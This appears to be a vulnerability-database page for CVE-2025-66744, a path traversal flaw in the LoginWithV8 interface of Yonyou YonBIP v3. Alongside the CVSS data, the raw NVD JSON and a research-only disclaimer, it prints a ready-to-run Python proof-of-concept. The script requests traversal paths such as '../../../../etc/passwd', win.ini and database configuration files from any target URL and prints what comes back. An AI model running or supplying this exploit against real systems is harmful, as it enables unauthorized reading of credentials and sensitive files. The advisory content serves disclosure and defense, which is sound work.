Security Vulnerability Report
中文
CVE-2025-66744 CVSS 7.5 HIGH

CVE-2025-66744

Published: 2026-01-09 17:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

用友YonBIP v3及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66744 PoC - Yonyou YonBIP LoginWithV8 Path Traversal # Target: Yonyou YonBIP v3 and before def exploit_path_traversal(target_url): """ Exploit CVE-2025-66744: Path Traversal in LoginWithV8 interface """ # Common sensitive files to check sensitive_files = [ '../../../../windows/win.ini', '../../../../etc/passwd', '../../../webapps/ROOT/WEB-INF/classes/db.properties', '../../../config/database.yml', '../../../logs/application.log' ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-66744 - Path Traversal in LoginWithV8\n") for file_path in sensitive_files: try: # Construct the malicious URL exploit_url = f"{target_url}/LoginWithV8?file={file_path}" print(f"[*] Testing: {file_path}") response = requests.get(exploit_url, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] SUCCESS! Retrieved file content:") print(response.text[:500]) print("-" * 50) return True else: print(f"[-] Failed (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-66744.py <target_url>") print("Example: python cve-2025-66744.py http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66744", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:52.927", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system"}, {"lang": "es", "value": "En Yonyou YonBIP v3 y versiones anteriores, la interfaz LoginWithV8 en el sistema de servicio de aplicaciones de datos de series es vulnerable a salto de ruta, lo que permite el acceso no autorizado a información sensible dentro del sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/iSee857/YonYouBip-path-travel", "source": "[email protected]"}, {"url": "https://github.com/iSee857/YonYouBip-path-travel", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.